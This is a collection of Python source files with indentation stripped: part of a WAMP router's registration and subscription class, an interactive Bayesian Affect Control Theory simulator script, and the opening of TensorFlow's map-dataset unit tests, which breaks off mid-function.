thread_process.daemon = True
thread_process.start()
elif handler['type'] == 'remote':
def on_yield(result):
if result == WAMP_YIELD:
callback(RESULT(
request_id = request.request_id,
details = details,
args = result.args,
kwargs = result.kwargs
))
else:
callback(result)
registration_id = handler['registration_id']
handler_client = handler['client']
if handler_client.closed():
self.reap_client(handler_client)
raise Exception('uri does not exist')
handler_client.send_and_await_response(
INVOCATION(
request_id = request.request_id,
registration_id = registration_id,
details = details,
args = args,
kwargs = kwargs
),
on_yield
)
else:
raise Exception('Unknown handler type')
def subscribe_local(self,uri,callback,options=None):
""" Registers a local function to be invoked when the URI
matches a particular pattern
"""
subscription_id = secure_rand()
sub_uri = WAMPURI(uri,{
'subscription_id': subscription_id,
'type': 'local',
'callback': callback,
},options)
self.subscribed.append(sub_uri)
return subscription_id
def subscribe_remote(self,uri,client,options=None):
""" Registers a remote function to be invoked when the URI
matches a particular pattern
"""
subscription_id = secure_rand()
sub_uri = WAMPURI(uri,{
'subscription_id': subscription_id,
'type': 'remote',
'client': client,
},options)
self.subscribed.append(sub_uri)
return subscription_id
def unsubscribe(self,subscription_id):
""" Removes a URI as a subscriber target
"""
self.subscribed.remove(lambda r: r['subscription_id'] == subscription_id)
return subscription_id
def publish(self,request):
""" Send the publication to all subscribers
(If there are any...)
"""
uri = request.topic
publish_id = secure_rand()
details = {
'topic': uri
}
subscribers = self.subscribed.match(uri)
for subscriber in subscribers:
publish_event = EVENT(
subscription_id = subscriber['subscription_id'],
publish_id = publish_id,
args = request.args,
kwargs = request.kwargs,
details = details,
)
if subscriber['type'] == 'local':
subscriber['callback'](publish_event)
elif subscriber['type'] == 'remote':
client = subscriber['client']
if client.closed():
self.reap_client(client)
continue
client.send_message(publish_event)
return publish_id
def reap_client(self,client):
""" Removes a client from all registrations and subcriptions
Usually used when a client disconnects
"""
self.registered.remove(lambda r: r.get('client') == client)
self.subscribed.remove(lambda r: r.get('client') == client)
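# Illustrative sketch (not part of the original module): basic book-keeping with
# WAMPRegistrations. The URIs and the `add`/`on_event` callbacks are hypothetical;
# this shows only how handlers are registered and removed, not a full WAMP round trip.
def _example_registrations():
    regs = WAMPRegistrations()
    def add(invocation, x, y):
        return x + y
    def on_event(event):
        print(event)
    registration_id = regs.register_local('com.example.add', add)
    subscription_id = regs.subscribe_local('com.example.topic', on_event)
    # both ids can later be used to remove the handlers again
    regs.unregister(registration_id)
    regs.unsubscribe(subscription_id)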
|
bayesactinteractive.py
|
"""------------------------------------------------------------------------------------------
Bayesian Affect Control Theory
Interactive Example
Author: Jesse Hoey jhoey@cs.uwaterloo.ca http://www.cs.uwaterloo.ca/~jhoey
September 2013
Use for research purposes only.
Please do not re-distribute without written permission from the author
Any commercial uses strictly forbidden.
Code is provided without any guarantees.
Research sponsored by the Natural Sciences and Engineering Council of Canada (NSERC).
use python2.6
see README for details
----------------------------------------------------------------------------------------------"""
from bayesact import *
from bayesactemot import *
import getopt
import sys
import threading
sys.path.append("./gui/")
from cEnum import eTurn
class cBayesactInteractive(object):
def __init__(self, argv, plotter=None):
#NP.set_printoptions(precision=5)
#NP.set_printoptions(suppress=True)
NP.set_printoptions(linewidth=10000)
#-----------------------------------------------------------------------------------------------------------------------------
#user-defined parameters
#-----------------------------------------------------------------------------------------------------------------------------
#agent knowledge of client id:
#0 : nothing
#1 : one of a selection of num_confusers+1 randoms
#2 : exactly - use this to mimic interact
#3 : same as 0 but also agent does not know its own id
self.agent_knowledge=0
# agent gender
self.agent_gender="male"
# client gender
self.client_gender="male"
#possibly set the agent id to be something
self.agent_id="tutor"
#if not in database (including "") then it is a randomly drawn id
#agent_id=""
#can also set the client id here if agent_knowledge = 2 (knows id of client - see above)
#if agent_knowledge is 0 then this is ignored
#client_id = "professor"
self.client_id = "student"
#who goes first?
self.initial_turn="agent"
#how often do we want to see the full id sets learned by the agent
self.get_full_id_rate=10
#do we want to try to mimic interact?
self.mimic_interact=False
#use pomcp for planning (default use heuristic/greedy method)
self.use_pomcp=False
#parameters for pomcp
#number of continuous actions we wish to sample -
#this is user-defined and is an important parameter
#larger numbers mean bigger, slower, more accurate planning trees
self.numcact=5
#number of discrete (propositional) actions
#this should be set according to the domain, and is 1 for this generic class
#one discrete action really means no choice
self.numdact=1
#observation resolution when building pomcp plan tree
self.obsres=1.0
#action resolution when building pomcp plan tree
self.actres=0.1
#timeout used for POMCP
self.timeout=5.0
#-----------------------------------------------------------------------------------------------------------------------------
#these parameters can be tuned, but using caution
#-----------------------------------------------------------------------------------------------------------------------------
#agent's ability to change identities - higher means it will shape-shift more
self.bvagent=0.0001
#agent's belief about the client's ability to change identities - higher means it will shape-shift more
self.bvclient=0.0001
#-----------------------------------------------------------------------------------------------------------------------------
#these parameters can be tuned, but will generally work "out of the box" for a basic simulation
#-----------------------------------------------------------------------------------------------------------------------------
#behaviours file
self.fbfname="fbehaviours.dat"
#identities file
self.fifname="fidentities.dat"
#get some key parameters from the command line
#set much larger to mimic interact (>5000)
self.num_samples=500
# use 0.0 for mimic interact simulations
#roughening_noise=0.0
self.roughening_noise=self.num_samples**(-1.0/3.0)
#the observation noise
#set to 0.05 or less to mimic interact
self.obs_noise=0.1
if self.mimic_interact:
self.mimicInteract()
self.gamma_value=self.obs_noise
#for emotional agent - gamma value for observations of emotion
self.gammae_value = 0.1
#do we print out all the samples each time
self.learn_verbose=False
#for repeatability
self.rseed = NP.random.randint(0,382948932)
#rseed=271887164
NP.random.seed(self.rseed)
#if true, will use an EmotionalAgent from bayesactemot.py
#rather than an Agent from bayesact.py
self.useEmotionalAgent = False
self.helpstring="Bayesact interactive simulator (1 agent, 1 human) usage:\n bayesactinteractive.py\n\t -n <number of samples (default 500)>\n\t -a <agent knowledge (0,1,2) (Default 2)>\n\t -r <roughening noise: default n^(-1/3) - to use no roughening ('full' method), specify 0>\n\t -g <gamma_value (default 0.1)>\n\t -i <agent id label: default randomly chosen>\n\t -j <client id label: default randomly chosen>\n\t -k <agent gender (default: male) - only works if agent_id is specified with -i>\n\t -l (client gender (default: male) only works if client_id is specified with -j>\n\t -m <gammae_value (default 0.0 or emotions not used)>\n\t"
try:
self.opts, self.args = getopt.getopt(argv[1:],"huvon:t:x:a:c:d:r:e:g:m:i:j:k:l:",["help","n=","t=","x=","c=","a=","u=","d=","r=","e=","g=","m=","i=","j=","k=","l="])
except getopt.GetoptError:
print self.helpstring
sys.exit(2)
for opt, arg in self.opts:
if opt == '-h':
print self.helpstring
sys.exit()
elif opt == "-v":
self.learn_verbose=True
elif opt in ("-n", "--numsamples"):
self.num_samples = int(arg)
elif opt in ("-a", "--agentknowledge"):
self.agent_knowledge = int(arg)
elif opt in ("-r", "--roughen"):
self.roughening_noise=float(arg)
elif opt in ("-g", "--gamma"):
self.gamma_value=float(arg)
elif opt in ("-m", "--gammae"):
self.gammae_value=float(arg)
self.useEmotionalAgent = True
elif opt in ("-i", "--agentid"):
self.agent_id=arg
elif opt in ("-j", "--clientid"):
self.client_id=arg
elif opt in ("-k", "--agentgender"):
self.agent_gender=arg
elif opt in ("-l", "--clientgender"):
self.client_gender=arg
self.plotter=plotter
def mimicInteract(self):
self.bvagent_init=0.000001
self.bvclient_init=0.000001
self.bvagent=0.00001
self.bvclient=0.00001
self.agent_knowledge=2
self.num_samples=10000
self.roughening_noise=0.0
self.obs_noise=0.01
#FIXME: what does this do?
self.num_action_samples=10000
def startBayesactInteractive(self):
print "random seeed is : ",self.rseed
#-----------------------------------------------------------------------------------------------------------------------------
#code start - here there be dragons - only hackers should proceed, with caution
#-----------------------------------------------------------------------------------------------------------------------------
def is_array_of_floats(possarray):
try:
parr = [float(x) for x in possarray.split(',')]
except ValueError:
return False
if len(parr)==3:
return parr
return False
#a function to ask the client for a value (either string label or EPA vector)
# to take and map it to an EPA value. string labels and EPA are related through dictionary fbeh
# inputs who and what are just for printing messages describing what is going on
# inputs sugg_act and epaact are a default label or vector the user can choose easily
def ask_client(fbeh,sugg_act='',epaact=[],who="agent",what="action"):
sst=what+" to enact/display/take for "+who+" ('?' shows options): "
sstnc="You can now either :\n"
sstnc+="- pick an "+what+" and type in its label\n"
sstnc+="- type 'quit' to stop the simulation\n"
sstnc+="- type a comma separated list of three numbers to specify the "+what+" as E,P,A values\n"
if not sugg_act=='':
sstnc+="- hit 'enter' to take default "+what+" with label: "+sugg_act+"\n"
if not epaact==[]:
sstnc+="- type any digit (0-9) to take suggsted "+what+": "+str(epaact)
while True:
cact = raw_input(sst)
if cact=='quit':
return []
elif cact=='' and not sugg_act=='':
cact=sugg_act
break
elif cact.isdigit() and not epaact==[]:
return epaact
elif re.sub(r"\s+","_",cact.strip()) in fbeh.keys():
cact=re.sub(r"\s+","_",cact.strip())
break
elif cact=="?":
print sstnc
elif is_array_of_floats(cact):
return [float(x) for x in cact.split(',')]
else:
print "incorrect or not found, try again. '?' shows options"
observ=map(lambda x: float (x), [fbeh[cact]["e"],fbeh[cact]["p"],fbeh[cact]["a"]])
print "client said: ",observ
return observ
fbehaviours_agent=readSentiments(self.fbfname,self.agent_gender)
fbehaviours_client=readSentiments(self.fbfname,self.client_gender)
(agent_mean_ids,agent_cov_ids)=getIdentityStats(self.fifname,self.agent_gender)
(client_mean_ids,client_cov_ids)=getIdentityStats(self.fifname,self.client_gender)
#the mean and covariance of IDs for male agents as taken from the databases
#should do this automatically in python based on actual genders of client/agent....as above now
#mean_ids=NP.array([0.40760,0.40548,0.45564])
#cov_ids=NP.array([[2.10735,1.01121, 0.48442],[1.01121,1.22836,0.55593],[0.48442,0.55593,0.77040]])
#the actual (true) ids drawn from the distribution over ids, if not set to something in particular
self.agent_id=getIdentity(self.fifname,self.agent_id,self.agent_gender)
if self.agent_id==[]:
self.agent_id=NP.random.multivariate_normal(agent_mean_ids,agent_cov_ids)
self.agent_id=NP.asarray([self.agent_id]).transpose()
#here we get the identity of the client *as seen by the agent*
self.client_id=getIdentity(self.fifname,self.client_id,self.agent_gender)
if self.client_id==[]:
self.client_id = NP.random.multivariate_normal(client_mean_ids,client_cov_ids)
self.client_id=NP.asarray([self.client_id]).transpose()
#get initial sets of parameters for agent
(learn_tau_init,learn_prop_init,learn_beta_client_init,learn_beta_agent_init)=init_id(self.agent_knowledge,self.agent_id,self.client_id,client_mean_ids)
#overwrite these values for the interactive script only
#do this for mimicking interact
if self.mimic_interact:
learn_beta_agent_init=self.bvagent_init
learn_beta_client_init=self.bvclient_init
#initial x - only contains the turn for a default agent (no other x components)
learn_initx=self.initial_turn
#get the agent - can use some other subclass here if wanted
if self.useEmotionalAgent:
learn_agent=EmotionalAgent(N=self.num_samples,alpha_value=1.0,
gammae_value=self.gammae_value, gamma_value=self.gamma_value,
beta_value_agent=self.bvagent,beta_value_client=self.bvclient,
beta_value_client_init=learn_beta_client_init,beta_value_agent_init=learn_beta_agent_init,
client_gender=self.client_gender,agent_gender=self.agent_gender,
agent_rough=self.roughening_noise,client_rough=self.roughening_noise,use_pomcp=self.use_pomcp,
init_turn=self.initial_turn,numcact=self.numcact,numdact=self.numdact,obsres=self.obsres,
actres=self.actres,pomcp_timeout=self.timeout)
else:
learn_agent=Agent(N=self.num_samples,alpha_value=1.0,
gamma_value=self.gamma_value,beta_value_agent=self.bvagent,beta_value_client=self.bvclient,
beta_value_client_init=learn_beta_client_init,beta_value_agent_init=learn_beta_agent_init,
client_gender=self.client_gender,agent_gender=self.agent_gender,
agent_rough=self.roughening_noise,client_rough=self.roughening_noise,use_pomcp=self.use_pomcp,
init_turn=self.initial_turn,numcact=self.numcact,numdact=self.numdact,obsres=self.obsres,
actres=self.actres,pomcp_timeout=self.timeout)
print 10*"-","learning agent parameters: "
learn_agent.print_params()
print "learner init tau: ",learn_tau_init
print "learner prop init: ",learn_prop_init
print "learner beta client init: ",learn_beta_client_init
print "learner beta agent init: ",learn_beta_agent_init
#the following two initialisation calls should be inside the Agent constructor to keep things cleaner
learn_avgs=learn_agent.initialise_array(learn_tau_init,learn_prop_init,learn_initx)
#To plot initial data
if (None != self.plotter):
#to send the initial sentiments to the plotter
learn_agent.sendSamplesToPlotter(learn_agent.samples,self.plotter,eTurn.learner)
self.plotter.plot()
print "learner average sentiments (f): "
learn_avgs.print_val()
done = False
iter=0
while not done:
print 10*"-","iter ",iter,80*"-"
learn_avgs = learn_agent.getAverageState()
print "agent state is: "
learn_avgs.print_val()
#this always works here, but is only needed to avoid asking the user too many questions
#and to figure out the observation
learn_turn=learn_avgs.get_turn()
print learn_turn
observ=[]
#if use_pomcp or learn_turn=="agent":
#get the next action for the agent - may be a null action if it is the client turn
(learn_aab,learn_paab)=learn_agent.get_next_action(learn_avgs,exploreTree=True)
if learn_turn=="agent":
aact=findNearestBehaviour(learn_aab,fbehaviours_agent)
print "suggested action for the agent is :",learn_aab,"\n closest label is: ",aact
if self.useEmotionalAgent:
agentEmotion = learn_agent.expectedEmotion("agent")
clientEmotion = learn_agent.expectedEmotion("client")
clientEmotionLabel = learn_agent.findNearestEmotion(clientEmotion)
print "agent is feeling: ",agentEmotion," which is : ",learn_agent.findNearestEmotion(agentEmotion)
print "agent thinks client is feeling: ",clientEmotion," which is: ",clientEmotionLabel
if learn_turn=="agent":
#we only want to ask the user for an action if it is his turn,
#although this could be relaxed to allow the agent to barge in
#this will be relevant if the turn is non-deterministic, in which case there
#may be some samples for each turn value, and we may want an action to take??
learn_aab=ask_client(fbehaviours_agent,aact,learn_aab,learn_turn)
print "agent does action :",learn_aab,"\n"
learn_observ=[]
learn_eobserv=[]
else:
#first, see what the agent would predict and suggest this to the client
#this can be removed in a true interactive setting, so this is only here so we can see what is going on
(client_aab,client_paab)=learn_agent.get_default_predicted_action(learn_avgs)
aact=findNearestBehaviours(client_aab,fbehaviours_agent,10)
print "agent advises the following action :",client_aab,"\n closest labels are: ", [re.sub(r"_"," ",i.strip()) for i in aact]
#now, this is where the client actually decides what to do, possibly looking at the suggested labels from the agent
#we use fbehaviours_agent here (for agent gender) as it is the agent who is perceiving this
learn_observ=ask_client(fbehaviours_agent,aact[0],client_aab,learn_turn)
#should be to get a default (null) action from the agent
#learn_aab=[0.0,0.0,0.0]
print "client action: ",learn_observ
if self.useEmotionalAgent:
learn_eobserv = ask_client(learn_agent.emotdict,clientEmotionLabel,clientEmotion,learn_turn,"emotion")
#we may be done if the user has killed the interaction
if learn_turn=="client" and learn_observ==[]:
done = True
elif learn_turn=="agent" and learn_aab==[]:
done = True
else:
#agent gets to observe the turn each time
learn_xobserv=[State.turnnames.index(invert_turn(learn_turn))]
#the main SMC update step
if self.useEmotionalAgent:
learn_avgs=learn_agent.propagate_forward(learn_aab,learn_observ,learn_xobserv,learn_paab,verb=self.learn_verbose,plotter=self.plotter,agent=eTurn.learner,eobserv=learn_eobserv)
else:
learn_avgs=learn_agent.propagate_forward(learn_aab,learn_observ,learn_xobserv,learn_paab,verb=self.learn_verbose,plotter=self.plotter,agent=eTurn.learner)
#To plot data
if (None != self.plotter):
self.plotter.plot()
#I think these should be based on fundamentals, not transients
(aid,cid)=learn_agent.get_avg_ids(learn_avgs.f)
print "agent thinks it is most likely a: ",aid
print "agent thinks the client is most likely a: ",cid
if self.get_full_id_rate>0 and (iter+1)%self.get_full_id_rate==0:
(cnt_ags,cnt_cls)=learn_agent.get_all_ids()
print "agent thinks of itself as (full distribution): "
print cnt_ags[0:10]
print "agent thinks of the client as (full distribution): "
print cnt_cls[0:10]
if self.useEmotionalAgent:
agentEmotion = learn_agent.expectedEmotion("agent")
clientEmotion = learn_agent.expectedEmotion("client")
clientEmotionLabel = learn_agent.findNearestEmotion(clientEmotion)
print "agent is feeling: ",agentEmotion," which is : ",learn_agent.findNearestEmotion(agentEmotion)
print "agent thinks client is feeling: ",clientEmotion," which is: ",clientEmotionLabel
iter += 1
print "current deflection of averages: ",learn_agent.deflection_avg
learn_d=learn_agent.compute_deflection()
print "current deflection (agent's perspective): ",learn_d
if (None != self.plotter and None != self.plotter.m_PlotFrame):
self.plotter.m_PlotFrame.Close()
def main(argv):
plot = False
oBayesactInteractive = cBayesactInteractive(argv, plotter=None)
# A hack, should probably be fixed later
helpstring="Bayesact simulator (2 agents) usage:\n bayesactsim.py\n\t -t <number of trials (default 20)>\n\t -x <number of experiments per trial (default 10)>\n\t -n <number of samples (default 1000)>\n\t -c <client knowledge (0,1,2) (default 2)>\n\t -a <agent knowledge (0,1,2) (Default 0)>\n\t -u (if specified - do uniform draws)\n\t -d <max horizon - default 50>\n\t -r <roughening noise: default n^(-1/3) - to use no roughening ('full' method), specify 0>\n\t -e <environment noise (default 0.0)>\n\t -g <gamma_value (default 1.0)>\n\t -i <agent id label: default randomly chosen>\n\t -j <client id label: default randomly chosen>\n\t -k <agent gender (default: male) - only works if agent_id is specified with -i>\n\t -l (client gender (default: male) only works if client_id is specified with -j>\n\t -m <gammae_value (default 0.0 or emotions not used)>\n\t"
try:
opts, args = getopt.getopt(argv[1:],"huvon:t:x:a:c:d:r:e:g:i:j:m:k:l:",["help","n=","t=","x=","c=","a=","u=","d=","r=","e=","g=","i=","j=","k=","l="])
except getopt.GetoptError:
print helpstring
sys.exit(2)
for opt, arg in opts:
if "-o" == opt:
plot = True
if (False == plot):
oBayesactInteractive.startBayesactInteractive()
else:
from cPlotBayesactThread import cPlotBayesactThread
plotter = cPlotBayesactThread()
plotPanel = plotter.initFrame()
plotter.initPlotBayesactSim(plotPanel)
oBayesactInteractive.plotter = plotter
bayesactSimThread = threading.Thread(target=oBayesactInteractive.startBayesactInteractive)
plotter.setThread(bayesactSimThread)
plotter.startApp()
if __name__ == "__main__":
main(sys.argv)
|
map_dataset_op_test.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for the experimental input pipeline ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from collections import namedtuple
import threading
import time
import warnings
import numpy as np
from tensorflow.core.framework import attr_value_pb2
from tensorflow.python.client import session
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.ops import functional_ops
from tensorflow.python.ops import lookup_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import script_ops
from tensorflow.python.ops import sparse_ops
from tensorflow.python.ops import string_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.platform import test
class MapDatasetTest(test.TestCase):
def _buildMapDataset(self, components, count):
def _map_fn(x, y, z):
return math_ops.square(x), math_ops.square(y), math_ops.square(z)
return (dataset_ops.Dataset.from_tensor_slices(components).map(_map_fn)
.repeat(count))
def testMapDataset(self):
"""Test an dataset that maps a TF function across its input elements."""
# The pipeline is TensorSliceDataset -> MapDataset(square_3) ->
# RepeatDataset(count).
components = (np.arange(7),
np.array([[1, 2, 3]]) * np.arange(7)[:, np.newaxis],
np.array(37.0) * np.arange(7))
count = array_ops.placeholder(dtypes.int64, shape=[])
dataset = self._buildMapDataset(components, count)
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
self.assertEqual([c.shape[1:] for c in components],
[t.shape for t in get_next])
with self.test_session() as sess:
# Test single-threaded access to the iterator.
sess.run(init_op, feed_dict={count: 14})
for _ in range(14):
for i in range(7):
result = sess.run(get_next)
for component, result_component in zip(components, result):
self.assertAllEqual(component[i]**2, result_component)
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
# Test multi-threaded access to the same iterator.
sess.run(init_op, feed_dict={count: 18})
results = []
def iterator_thread():
while True:
try:
results.append(sess.run(get_next))
except errors.OutOfRangeError:
return
threads = [self.checkedThread(target=iterator_thread) for _ in range(8)]
for t in threads:
t.start()
for t in threads:
t.join()
# `results` will contain the same elements components**2
# repeated 18 times, but in a non-deterministic order. Sort the
# results, and assert that each element of components**2 is
# produced 18 times.
results.sort(key=lambda x: x[0])
for i in range(7):
for j in range(18):
for component, result_component in zip(components,
results[i * 18 + j]):
self.assertAllEqual(component[i]**2, result_component)
def _buildParallelMapDataset(self, components, count, num_parallel_calls,
output_buffer_size):
def _map_fn(x, y, z):
return math_ops.square(x), math_ops.square(y), math_ops.square(z)
return (dataset_ops.Dataset.from_tensor_slices(components)
.map(_map_fn, num_parallel_calls=num_parallel_calls)
.prefetch(output_buffer_size)
.repeat(count))
def testParallelMapDataset(self):
"""Test an dataset that maps a TF function across its input elements."""
# The pipeline is TensorSliceDataset -> ParallelMapDataset(square_3) ->
# RepeatDataset(count).
components = (np.arange(7),
np.array([[1, 2, 3]]) * np.arange(7)[:, np.newaxis],
np.array(37.0) * np.arange(7))
count = array_ops.placeholder(dtypes.int64, shape=[])
num_parallel_calls = array_ops.placeholder(dtypes.int32, shape=[])
output_buffer_size = array_ops.placeholder(dtypes.int64, shape=[])
dataset = self._buildParallelMapDataset(
components, count, num_parallel_calls, output_buffer_size)
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
self.assertEqual([c.shape[1:] for c in components],
[t.shape for t in get_next])
with self.test_session() as sess:
def do_test(num_parallel_calls_val, output_buffer_size_val):
# Test single-threaded access to the iterator.
sess.run(init_op, feed_dict={
count: 14,
num_parallel_calls: num_parallel_calls_val,
output_buffer_size: output_buffer_size_val})
for _ in range(14):
for i in range(7):
result = sess.run(get_next)
for component, result_component in zip(components, result):
self.assertAllEqual(component[i]**2, result_component)
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
# Test multi-threaded access to the same iterator.
sess.run(init_op, feed_dict={
count: 18,
num_parallel_calls: num_parallel_calls_val,
output_buffer_size: output_buffer_size_val})
results = []
def iterator_thread():
while True:
try:
results.append(sess.run(get_next))
except errors.OutOfRangeError:
return
threads = [self.checkedThread(target=iterator_thread)
for _ in range(64)]
for t in threads:
t.start()
for t in threads:
t.join()
# `results` will contain the same elements components**2
# repeated 18 times, but in a non-deterministic order. Sort the
# results, and assert that each element of components**2 is
# produced 18 times.
results.sort(key=lambda x: x[0])
for i in range(7):
for j in range(18):
for component, result_component in zip(components,
results[i * 18 + j]):
self.assertAllEqual(component[i]**2, result_component)
for num_parallel_calls_val, output_buffer_size_val in [
(1, 1), (1, 2), (2, 2), (2, 4), (8, 8), (8, 16)]:
do_test(num_parallel_calls_val, output_buffer_size_val)
def testImplicitDisposeParallelMapDataset(self):
# Tests whether a parallel map dataset will be cleaned up correctly when
# the pipeline does not run it until exhaustion.
# The pipeline is TensorSliceDataset -> MapDataset(square_3) ->
# RepeatDataset(1000).
components = (np.arange(1000),
np.array([[1, 2, 3]]) * np.arange(1000)[:, np.newaxis],
np.array(37.0) * np.arange(1000))
dataset = self._buildParallelMapDataset(components, 1000, 100, 100)
# NOTE(mrry): Also test that the prefetching thread is cancelled correctly.
dataset = dataset.prefetch(100)
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for _ in range(3):
sess.run(get_next)
def testParallelMapUnspecifiedOutputSize(self):
components = np.array([1., 2., 3., np.nan, 5.]).astype(np.float32)
dataset = (dataset_ops.Dataset.from_tensor_slices(components)
.map(lambda x: array_ops.check_numerics(x, "message"),
num_parallel_calls=2))
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for _ in range(3):
sess.run(get_next)
def testParallelMapError(self):
components = np.array([1., 2., 3., np.nan, 5.]).astype(np.float32)
dataset = (dataset_ops.Dataset.from_tensor_slices(components)
.map(lambda x: array_ops.check_numerics(x, "message"),
num_parallel_calls=2))
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for _ in range(3):
sess.run(get_next)
# The 4th element is NaN, so `array_ops.check_numerics()` should fail.
with self.assertRaises(errors.InvalidArgumentError):
sess.run(get_next)
sess.run(get_next)
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testPrefetchError(self):
components = np.array([1., 2., 3., np.nan, 5.]).astype(np.float32)
dataset = (dataset_ops.Dataset.from_tensor_slices(components)
.map(lambda x: array_ops.check_numerics(x, "message"))
.prefetch(2))
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for _ in range(3):
sess.run(get_next)
# The 4th element is NaN, so `array_ops.check_numerics()` should fail.
with self.assertRaises(errors.InvalidArgumentError):
sess.run(get_next)
sess.run(get_next)
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testCaptureHashTable(self):
# NOTE(mrry): We must use the V2 variants of `HashTable`
# etc. because these produce a `tf.resource`-typed output that is
# compatible with the in-graph function implementation.
default_val = -1
keys = constant_op.constant(["brain", "salad", "surgery"])
values = constant_op.constant([0, 1, 2], dtypes.int64)
table = lookup_ops.HashTable(
lookup_ops.KeyValueTensorInitializer(keys, values), default_val)
input_sentences = dataset_ops.Dataset.from_tensor_slices(
["brain brain tank salad surgery", "surgery brain"])
iterator = (input_sentences
.map(lambda x: string_ops.string_split([x]).values)
.map(table.lookup)
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(table.init)
sess.run(init_op)
sess.run(get_next)
sess.run(get_next)
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testCaptureQueue(self):
elements = np.random.randint(100, size=[200])
queue = data_flow_ops.FIFOQueue(200, dtypes.int64, shapes=[])
enqueue_op = queue.enqueue_many(elements)
close_op = queue.close()
iterator = (dataset_ops.Dataset.from_tensors(0).repeat(-1)
.map(lambda _: queue.dequeue()).make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(enqueue_op)
sess.run(close_op)
sess.run(init_op)
for element in elements:
self.assertEqual(element, sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testCaptureSameResourceMultipleTimes(self):
elements = np.random.randint(100, size=[200])
queue = data_flow_ops.FIFOQueue(
200, dtypes.int64, shapes=[], shared_name="shared_queue")
queue_2 = data_flow_ops.FIFOQueue(
200, dtypes.int64, shapes=[], shared_name="shared_queue")
enqueue_op = queue.enqueue_many(elements)
close_op = queue.close()
iterator = (dataset_ops.Dataset.from_tensors(0).repeat(-1)
.map(lambda _: (queue.dequeue(), queue_2.dequeue()))
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(enqueue_op)
sess.run(close_op)
sess.run(init_op)
for i in range(100):
self.assertEqual(sorted([elements[i * 2], elements[i * 2 + 1]]),
sorted(sess.run(get_next)))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testCaptureVariable(self):
counter_var = variable_scope.get_variable(
"counter", (), dtypes.int32, use_resource=True)
iterator = (dataset_ops.Dataset.from_tensors(0).repeat(10)
.map(lambda _: counter_var.assign_add(1))
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(counter_var.initializer)
sess.run(init_op)
for i in range(10):
self.assertEqual(i, sess.run(counter_var))
self.assertEqual(i + 1, sess.run(get_next))
self.assertEqual(10, sess.run(counter_var))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
self.assertEqual(10, sess.run(counter_var))
def testCaptureUninitializedVariableError(self):
counter_var = variable_scope.get_variable(
"counter", (), dtypes.int32, use_resource=True)
iterator = (dataset_ops.Dataset.from_tensors(0).repeat(10)
.map(lambda _: counter_var.assign_add(1))
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
with self.assertRaises(errors.NotFoundError):
sess.run(get_next)
def testSeededStatefulOperatorIsProperlyStateful(self):
iterator = (dataset_ops.Dataset.from_tensors(0).repeat(10)
.map(lambda _: random_ops.random_uniform((), seed=11)).batch(2)
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
random_values = []
with self.assertRaises(errors.OutOfRangeError):
while True:
random_values.extend(sess.run(get_next))
self.assertEqual(10, len(random_values))
self.assertGreater(np.abs(np.diff(random_values)).max(), 1e-6)
sess.run(init_op)
random_values_2 = []
with self.assertRaises(errors.OutOfRangeError):
while True:
random_values_2.extend(sess.run(get_next))
# Randomness is repeatable given same seed
self.assertAllClose(random_values, random_values_2)
def testMapDict(self):
iterator = (dataset_ops.Dataset.range(10)
.map(lambda x: {"foo": x * 2, "bar": x ** 2})
.map(lambda d: d["foo"] + d["bar"])
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for i in range(10):
self.assertEqual(i * 2 + i ** 2, sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testMapNamedtuple(self, count=10):
# construct dataset of tuples
labels = dataset_ops.Dataset.range(count)
images = labels.map(lambda l: -l)
dataset_tuple = dataset_ops.Dataset.zip((labels, images))
# convert dataset of tuples to dataset of namedtuples
example = namedtuple("Example", ["label", "image"])
dataset_namedtuple = dataset_tuple.map(example)
def preprocess_tuple(label, image):
image = 2 * image
return label, image
